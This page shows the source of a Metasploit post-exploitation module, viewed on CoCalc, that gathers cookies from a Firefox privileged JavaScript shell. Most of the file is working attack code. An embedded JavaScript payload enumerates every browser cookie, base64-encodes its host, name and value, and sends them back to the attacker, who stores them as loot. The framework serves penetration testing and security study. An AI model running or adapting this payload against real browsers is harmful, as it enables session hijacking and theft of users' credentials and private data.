CoCalc -- cookies.rb

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/firefox/gather/cookies.rb
¹⁹⁵⁹¹ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'json'
7

8
class MetasploitModule < Msf::Post
9
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Firefox Gather Cookies from Privileged JavaScript Shell',
16
        'Description' => %q{
17
          This module allows collection of cookies from a Firefox Privileged JavaScript Shell.
18
        },
19
        'License' => MSF_LICENSE,
20
        'Author' => [ 'joev' ],
21
        'DisclosureDate' => '2014-03-26',
22
        'Notes' => {
23
          'Stability' => [CRASH_SAFE],
24
          'SideEffects' => [],
25
          'Reliability' => []
26
        }
27
      )
28
    )
29

30
    register_options([
31
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])
32
    ])
33
  end
34

35
  def run
36
    results = js_exec(js_payload)
37
    if results.present?
38
      begin
39
        cookies = JSON.parse(results)
40
        cookies.each do |entry|
41
          entry.each_key { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
42
        end
43

44
        file = store_loot('firefox.cookies.json', 'text/json', rhost, results)
45
        print_good("Saved #{cookies.length} cookies to #{file}")
46
      rescue JSON::ParserError
47
        print_warning(results)
48
      end
49
    end
50
  end
51

52
  def js_payload
53
    %|
54
      (function(send){
55
        try {
56
          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
57
          var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"]
58
                        .getService(Components.interfaces.nsICookieManager);
59
          var cookies = [];
60
          var iter = cookieManager.enumerator;
61
          while (iter.hasMoreElements()){
62
            var cookie = iter.getNext();
63
            if (cookie instanceof Components.interfaces.nsICookie){
64
              cookies.push({host:b64(cookie.host), name:b64(cookie.name), value:b64(cookie.value)})
65
            }
66
          }
67
          send(JSON.stringify(cookies));
68
        } catch (e) {
69
          send(e);
70
        }
71
      })(this.send);
72
    |.strip
73
  end
74
end
75

76
Product

Resources

Company
